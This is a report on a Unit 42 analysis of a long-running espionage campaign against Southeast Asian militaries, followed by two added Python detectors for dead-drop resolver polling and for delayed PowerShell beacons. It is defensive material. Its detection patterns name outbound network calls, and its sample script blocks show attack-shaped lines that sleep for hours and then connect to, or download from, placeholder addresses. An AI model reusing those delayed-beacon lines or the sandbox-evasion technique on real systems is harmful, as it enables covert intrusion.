A suspected China-based cyber espionage campaign has targeted military organizations across Southeast Asia in a long-running operation that dates back to at least 2020, according to Palo Alto Networks’ Unit 42.
Researchers said the campaign, tracked as CL-STA-1087, focuses on carefully targeted intelligence gathering rather than large-scale data theft. The attackers reportedly searched for sensitive documents related to military capabilities, organizational structures, and cooperation with Western armed forces.
The operation uses two backdoors, AppleChris and MemFun, together with a credential-harvesting utility known as Getpass.
Researchers first detected the activity after identifying suspicious PowerShell commands that delayed execution for several hours before opening reverse connections to attacker-controlled command-and-control servers. How the attackers initially gained entry to the targeted networks remains unknown.
Once inside, the attackers deployed multiple versions of AppleChris across compromised systems to maintain access and move laterally within networks. Researchers said the group appeared particularly interested in documents related to command, control, communications, computers, and intelligence systems, commonly referred to as C4I.
The malware also used publicly accessible platforms such as Pastebin and Dropbox to retrieve the concealed command-and-control server addresses it needed to communicate with the attackers. Some of the Pastebin entries date back to September 2020.
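Because the server addresses are fetched from public services rather than embedded in the malware, the network side of this technique shows up in proxy logs as repeated fetches of the same paste or shared file, typically from a script client rather than a browser. The following is an added example of a detection pass over such logs; it is not code from Unit 42 or from the campaign's tooling. The log format, the watch-list of hosts, the user-agent tokens and the thresholds are all assumptions, and every log line is constructed for the example.

```python
"""Flag hosts that repeatedly fetch the same paste/shared file with a script client
or on a regular polling schedule (dead-drop resolver behaviour). Added example."""
from __future__ import annotations

import shlex
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import mean, pstdev

# Assumed watch-list of public services that can be abused as dead-drop resolvers.
DEAD_DROP_HOSTS = {"pastebin.com", "dl.dropboxusercontent.com", "www.dropbox.com"}
# Assumed user-agent fragments that indicate a script rather than a browser.
SCRIPT_CLIENT_TOKENS = ("PowerShell", "curl", "Wget", "python-requests")
MIN_FETCHES = 3          # one host must fetch one URL at least this often
MAX_JITTER_RATIO = 0.2   # stdev/mean of inter-request gaps at or below this is "regular"


@dataclass
class Request:
    ts: datetime
    src: str
    host: str
    path: str
    user_agent: str


@dataclass
class Finding:
    src: str
    url: str
    fetches: int
    reason: str


def parse_line(line: str) -> Request:
    """Parse a constructed proxy log line: <iso-ts> <src-ip> <host> <path> "<user-agent>"."""
    ts, src, host, path, ua = shlex.split(line)
    return Request(datetime.fromisoformat(ts.replace("Z", "+00:00")), src, host, path, ua)


def is_script_client(user_agent: str) -> bool:
    return any(tok in user_agent for tok in SCRIPT_CLIENT_TOKENS)


def is_regular(times: list[datetime]) -> bool:
    """True when the gaps between consecutive fetches vary little (beacon-like polling)."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return False
    return pstdev(gaps) <= MAX_JITTER_RATIO * mean(gaps)


def scan(lines: list[str]) -> list[Finding]:
    """Group fetches of watch-listed URLs per source host and apply both heuristics."""
    groups: dict[tuple[str, str], list[Request]] = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req.host in DEAD_DROP_HOSTS:
            groups[(req.src, req.host + req.path)].append(req)

    findings: list[Finding] = []
    for (src, url), reqs in sorted(groups.items()):
        if len(reqs) < MIN_FETCHES:
            continue  # a single visit to a paste is ordinary user behaviour
        reqs.sort(key=lambda r: r.ts)
        if is_script_client(reqs[-1].user_agent):
            reason = "script client"
        elif is_regular([r.ts for r in reqs]):
            reason = "regular polling"
        else:
            continue  # browser traffic at irregular times: leave it alone
        findings.append(Finding(src, url, len(reqs), reason))
    return findings


# Constructed sample log: one PowerShell poller, one browser-UA host polling every
# 30 minutes, one user reading a shared file at odd times, one single paste visit.
SAMPLE_LOG = [
    '2020-09-14T08:00:03Z 10.0.0.12 pastebin.com /raw/AbC123 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1"',
    '2020-09-14T09:00:05Z 10.0.0.12 pastebin.com /raw/AbC123 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1"',
    '2020-09-14T10:00:01Z 10.0.0.12 pastebin.com /raw/AbC123 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1"',
    '2020-09-14T09:12:40Z 10.0.0.45 www.dropbox.com /s/k9m2/notes.txt "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0"',
    '2020-09-14T09:15:02Z 10.0.0.45 www.dropbox.com /s/k9m2/notes.txt "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0"',
    '2020-09-14T16:40:19Z 10.0.0.45 www.dropbox.com /s/k9m2/notes.txt "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0"',
    '2020-09-14T08:00:00Z 10.0.0.50 dl.dropboxusercontent.com /s/q1w2/cfg.txt "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)"',
    '2020-09-14T08:30:00Z 10.0.0.50 dl.dropboxusercontent.com /s/q1w2/cfg.txt "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)"',
    '2020-09-14T09:00:00Z 10.0.0.50 dl.dropboxusercontent.com /s/q1w2/cfg.txt "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)"',
    '2020-09-14T11:02:11Z 10.0.0.33 pastebin.com /raw/XyZ987 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.src} fetched {f.url} {f.fetches}x ({f.reason})")
```

The two heuristics are deliberately independent: the user-agent check catches the obvious case, while the interval check still fires when a client spoofs a browser string but keeps a fixed polling schedule. A single fetch of a paste is never flagged, since people do legitimately open pastes and shared files.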
Another tool, MemFun, functions as a modular malware platform that can download additional malicious components during an attack. Meanwhile, Getpass, which is based on a modified version of the well-known hacking tool Mimikatz, was used to extract passwords and authentication data directly from compromised systems.
Researchers said several of the malware variants delayed their execution in order to evade automated security systems, allowing them to slip past common sandbox detection methods that only observe a sample for a short time.
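The initial detection described earlier (PowerShell that sleeps for hours and then connects out) and the sandbox-evasion point above are two views of the same behaviour, so one detection heuristic covers both: look for a long sleep that precedes an outbound network call in the same script block. The following is an added example of that logic run over PowerShell script-block text of the kind that Script Block Logging records; it is not code from Unit 42 or from the campaign. The one-hour threshold, the set of network indicators and all sample script blocks are assumptions constructed for the example.

```python
"""Flag PowerShell script blocks that sleep for a long time before making an outbound
network call (delayed beacon / sandbox-evasion pattern). Added example."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Assumed threshold: an hour exceeds what most admin scripts need and outlasts the
# analysis window of typical automated sandboxes.
LONG_DELAY_SECONDS = 3600

# Start-Sleep with -Seconds/-s, -Milliseconds/-ms/-m, or a positional value (seconds).
START_SLEEP_RE = re.compile(
    r"Start-Sleep\s+(?:-(?P<unit>[A-Za-z]+)\s+)?(?P<value>\d+)", re.IGNORECASE
)
# .NET Thread.Sleep(n) takes milliseconds.
THREAD_SLEEP_RE = re.compile(r"Thread\]::Sleep\(\s*(?P<value>\d+)\s*\)", re.IGNORECASE)
# Common ways a script block opens an outbound connection (assumed indicator list).
NETWORK_RE = re.compile(
    r"(Net\.Sockets\.TcpClient|Net\.WebClient|HttpWebRequest|Invoke-WebRequest|"
    r"Invoke-RestMethod|DownloadString|DownloadFile)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    record_id: str
    delay_seconds: float
    indicator: str


def delay_before(script: str, limit: int) -> float:
    """Total seconds of sleep whose call appears before character offset `limit`."""
    total = 0.0
    for m in START_SLEEP_RE.finditer(script):
        if m.start() >= limit:
            continue
        unit = (m.group("unit") or "seconds").lower()
        value = int(m.group("value"))
        total += value / 1000 if unit.startswith("m") else value  # -m*/-ms are milliseconds
    for m in THREAD_SLEEP_RE.finditer(script):
        if m.start() < limit:
            total += int(m.group("value")) / 1000
    return total


def analyze_block(record_id: str, script: str,
                  threshold: float = LONG_DELAY_SECONDS) -> Optional[Finding]:
    """Return a Finding when a long sleep precedes the first network indicator."""
    hit = NETWORK_RE.search(script)
    if hit is None:
        return None  # no outbound call at all: not the pattern of interest
    delay = delay_before(script, hit.start())
    if delay < threshold:
        return None  # short delay, or the sleep only comes after the network call
    return Finding(record_id, delay, hit.group(1))


def scan(records: Iterable[tuple[str, str]],
         threshold: float = LONG_DELAY_SECONDS) -> list[Finding]:
    return [f for rid, script in records if (f := analyze_block(rid, script, threshold))]


# Constructed sample script blocks (record id, script text). Addresses are documentation ranges.
SAMPLE_RECORDS = [
    ("ps-001", "Start-Sleep -Seconds 14400; $c = New-Object System.Net.Sockets.TcpClient('198.51.100.7', 443)"),
    ("ps-002", "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"),
    ("ps-003", "Invoke-WebRequest -Uri https://updates.example.test/a.msi -OutFile a.msi; Start-Sleep -s 7200"),
    ("ps-004", "Start-Sleep -Milliseconds 500; Invoke-RestMethod https://api.example.test/health"),
    ("ps-005", "[System.Threading.Thread]::Sleep(5400000); (New-Object Net.WebClient).DownloadString('http://203.0.113.9/c')"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.record_id}: slept {f.delay_seconds:.0f}s before {f.indicator}")
```

Ordering matters: ps-003 sleeps for two hours but only after its download, so it is an ordinary install-then-wait script and is not flagged, while ps-001 and ps-005 sleep first and connect afterwards, which is the shape the researchers used as their starting point.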